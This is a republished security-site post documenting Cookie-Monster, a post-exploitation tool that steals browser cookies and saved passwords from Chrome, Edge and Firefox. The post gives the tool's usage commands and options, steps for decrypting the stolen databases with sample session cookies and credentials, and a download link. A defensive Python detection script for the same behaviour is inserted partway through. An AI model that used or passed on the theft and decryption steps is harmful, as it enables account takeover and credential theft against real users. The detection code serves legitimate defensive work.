Post-Exploitation - Dump Cookie

admin, April 23, 2024 01:52:52


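Steal browser cookies from Edge, Chrome and Firefox via a BOF or an exe! Cookie-Monster extracts the WebKit master key, finds the browser process that holds handles to the Cookies and Login Data files, duplicates those handles, and then downloads the target filelessly.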

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]

cookie-monster Example:
    cookie-monster --chrome
    cookie-monster --edge
    cookie-monster --firefox
    cookie-monster --chromeCookiePID 1337
    cookie-monster --chromeLoginDataPID 1337
    cookie-monster --edgeCookiePID 4444
    cookie-monster --edgeLoginDataPID 4444

cookie-monster Options:
    --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
    --firefox, looks for profiles.ini and locates the key4.db and logins.json file
    --chromeCookiePID, if chrome PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
    --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
    --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
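For defenders, the behaviour described above (a process outside the browser duplicating chrome.exe/msedge.exe handles, or reading Firefox's key4.db and logins.json) can be matched in endpoint telemetry. The following is an added example, not code from Cookie-Monster or the original post; the event field names and sample events are constructed assumptions, loosely shaped like process-access (event ID 10) and audited file-access (event ID 4663) records.

```python
import ntpath

PROCESS_DUP_HANDLE = 0x0040  # Windows access right required to duplicate handles
CHROMIUM = {"chrome.exe", "msedge.exe"}
BROWSERS = CHROMIUM | {"firefox.exe"}
FIREFOX_STORES = {"key4.db", "logins.json"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def reason(event):
    """Return why an event matches the described behaviour, or None."""
    if base(event["source_image"]) in BROWSERS:
        return None  # a browser working on its own processes and files
    if event["event_id"] == 10:  # process access
        mask = int(event["granted_access"], 16)
        if base(event["target_image"]) in CHROMIUM and mask & PROCESS_DUP_HANDLE:
            return "non-browser process can duplicate browser handles"
    elif event["event_id"] == 4663:  # audited file access
        if base(event["object_name"]) in FIREFOX_STORES:
            return "non-browser process touched Firefox key/login store"
    return None

def scan(events):
    """List (source image, reason) for every matching event."""
    return [(e["source_image"], r) for e in events if (r := reason(e))]

# Constructed sample events; field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"event_id": 10, "source_image": r"C:\Users\bob\AppData\Local\Temp\upd.exe",
     "target_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "granted_access": "0x1440"},   # includes 0x0040: flagged
    {"event_id": 10, "source_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "granted_access": "0x1fffff"},  # browser to browser: ignored
    {"event_id": 10, "source_image": r"C:\Windows\System32\svchost.exe",
     "target_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "granted_access": "0x1000"},   # no dup-handle right: ignored
    {"event_id": 4663, "source_image": r"C:\Temp\tool.exe",
     "object_name": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\x.default\key4.db"},
    {"event_id": 4663, "source_image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "object_name": r"C:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\x.default\logins.json"},
]

if __name__ == "__main__":
    for src, why in scan(SAMPLE_EVENTS):
        print(f"ALERT {src}: {why}")
```

Security products and some system processes also open browsers with this access right, so a deployment needs an allowlist; matching on image name alone does not cover code running inside a browser process.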

EXE usage

Cookie Monster Example:
  cookie-monster.exe --all

Cookie Monster Options:
  -h, --help                     Show this help message and exit
  --all                          Run chrome, edge, and firefox methods
  --edge                         Extract edge keys and download Cookies/Login Data file to PWD
  --chrome                       Extract chrome keys and download Cookies/Login Data file to PWD
  --firefox                      Locate firefox key and Cookies, does not make a copy of either file

Decryption steps

Install requirements

pip3 install -r requirements.txt

Base64-encode the WebKit master key

python3 base64-encode.py "\xec\xfc...."

Decrypt the Chrome/Edge Cookies file

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt the Chrome/Edge passwords file

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox cookies and stored credentials:
https://github.com/lclevy/firepwd

Tool link

https://pan.quark.cn/s/f8bd6ee0786c

Originally published on the WeChat official account TtTeam: Post-Exploitation - Dump Cookie

  • Please keep this article's link when reprinting (CN-SEC中文网; thanks to the original author for their hard work): Post-Exploitation - Dump Cookie http://cn-sec.com/archives/2679144.html
